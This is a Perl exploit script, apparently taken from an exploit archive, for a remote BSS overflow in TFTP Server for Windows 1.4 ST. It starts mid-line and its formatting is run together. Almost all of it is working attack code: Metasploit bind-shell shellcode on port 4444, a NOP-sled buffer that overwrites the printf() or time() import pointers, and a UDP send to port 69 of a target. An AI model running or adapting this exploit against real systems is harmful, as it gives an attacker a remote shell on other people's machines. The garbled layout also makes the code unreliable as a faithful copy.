TFTP Server for Windows 1.4 ST Remote BSS Overflow Exploit

for a TFTP simple program\n";my $type = defined $ARGV[0] ? shift : 's';my $shellcode =# windows/shell_bind_tcp - 500 bytes# http://www.metasploit.com# EXITFUNC=seh, LPORT=4444"\x3d\x71\x41\xbf\x75\x04\x66\x32\xfc\x2 f\x84\xd4\x15\x24" ."\x0a\xfd\x92\xb5\x48\x76\x4b\x19\xe3\x73\x0c\x77 \x4f\x0d" ."\x4a\x43\x4e\x7c\x75\x1d\x7d\x28\xd6\x96\x79\x14 \x91\x7b" ."\x1c\xb2\x72\x34\xa9\x9f\xb1\x73\x49\x70\x25\x98 \x7f\x13" ."\xf5\x88\xe1\x3f\x74\x2c\xba\x7e\x20\xc1\xd1\xe2 \x12\xe0" ."\x11\xd6\x6b\xd0\xe3\x40\xbf\x9f\x4a\x2f\xb9\xa8 \x3d\xd2" ."\xeb\x0c\x7a\x2b\xf9\x4b\x49\x71\x05\x76\x37\xb4 \xb3\x86" ."\xd5\x41\x97\x66\xba\x91\x46\xb5\x47\x48\x9b\x35 \xa9\x43" ."\x4f\xbe\xb7\x93\xfc\x2c\x25\x90\x3c\x99\x92\x77 \x02\xfd" ."\xb8\x42\x98\x15\x14\xb6\x3f\xd4\x27\xf8\x2d\xf5 \x24\x1c" ."\x67\xbb\x1d\x4e\xb0\xb2\x0d\xb1\x34\x04\x96\xbb \xa0\x0c" ."\xb8\xde\xeb\x0c\x5e\x56\x31\x1e\xad\x01\xc3\x85 \xc0\x75" ."\xf7\xc3\xfc\xe8\xee\xff\xff\xff\x5c\x66\x53\x93 \x74\x8e" ."\x5c\xd3\x7b\x11\x28\x40\xa7\xf6\xa5\xdc\x9b\x7d \xc5\xdb" ."\x9b\x80\xd9\x6f\x14\x9b\xae\x2f\x8a\x9a\x5b\x86 \x41\xa8" ."\x10\x18\xbb\xe0\xe6\x82\xef\x87\x27\xc0\xe8\x46 \x6d\x24" ."\xf7\x8a\x99\xc3\xcc\x5e\x7a\x04\x47\xba\x09\x0b \x83\x45" ."\xe5\xd2\x40\x49\xb2\x91\x09\x4e\x45\x4d\xb6\x42 \xce\x18" ."\xd4\xbe\xcc\x7b\xe7\x8e\x37\x1f\x6c\xb3\xf7\x6b \x32\x38" ."\x73\x1b\xae\xed\x08\x9c\xc6\xb3\x66\x93\x98\x45 \x9b\xfb" ."\xdb\x8c\x05\xaf\x45\x59\xf9\x7d\xe1\xee\x8e\xb3 \xae\x44" ."\x8e\x64\x38\xae\x9d\x79\x83\x60\xa1\x54\xac\x09 \xb8\x3f" ."\xd3\xe7\x4b\xc2\x86\x9d\x49\x3d\xf8\x0a\x97\xc8 \x0d\x67" ."\x70\x34\x3b\x2b\x2c\x99\x90\x9f\x91\x4e\x55\x73 \xe9\xa1" ."\x3f\x1b\x04\x1e\xd9\x88\xaf\x7f\xb0\x47\x14\x65 \xca\x50" ."\x03\x65\xfc\x35\xbc\xc8\x55\x35\x6c\x82\xf1\x64 \xa3\xba" ."\xae\x89\x6a\x6f\x05\x89\x43\xf8\x40\x3c\xe2\xb0 \xdd\x40" ."\x3c\x12\xb5\xea\x94\x6c\xe5\x80\x7f\x74\x7c\x61 \x06\x2d" ."\x81\xbb\xac\x2e\xad\x22\x25\xb5\x2b\xc3\xda\x58 \x3a\xf6" ."\x77\xf3\x65\xd0\x4b\x7a\x72\x48\x10\xf4\x9e\xbc \x58\xf5" ."\xf4\x41\x1a\xd7\xf6\xfc\xb7\xb4\x8b\x7b\xf0\x11 \x38\xd0" ."\x68\x14\xc0\x94\x7f\x27\x49\x9f\x80\x01\xea\x48 \x2d\xff" ."\x5d\x26\xbb\xfe\x0c\x99\x6e\x50\x51\xc9\xf9\xff \x74\xef" ."\x37\xac\x79\x26\xad\xac\x7a\xf0\xcd\x83\x0f\xa8 \xcd\xa7" ."\xcb\x33\xd1\x7e\x81\x44\xfd\x17\xd5\x31\xfa\xb8 \x46\xb9" ."\xd5\xb8\xb8\x45\xda\x46\x38\x46\xda\x46";my ($RET,$buffer) = "\x01\x01\x42\x00"; # in the .idata sectionif ($type =~ /p/i) { # "\x00\x05" + 20411 bytes needed to patch the printf() function at 00420360 # --------------------------------------------------------------------------- # 0040EB50 -FF25 60034200 JMP DWORD PTR DS:[<&msvcrt.printf>] # --------------------------------------------------------------------------- print STDOUT "Exploiting TFTPServer RunStandAlone program\n"; $buffer = "\x90" x 19907 . $shellcode . $RET;}else { # "\x00\x05" + 20459 bytes needed to patch the time() function at 00420390 # ------------------------------------------------------------------------ # 0040EB60 -FF25 90034200 JMP DWORD PTR DS:[<&msvcrt.time>] # ------------------------------------------------------------------------ print STDOUT "Exploiting TFTPServer Service program\n"; $buffer = "\x90" x 19955 . $shellcode . $RET;}my $sock = IO::Socket::INET->new( PeerAddr => $target, PeerPort => 69, Proto => 'udp') or die "error: $!\n";$sock->send("\x00\x05" . $buffer, 0); print STDOUT "done.\n";exit 0;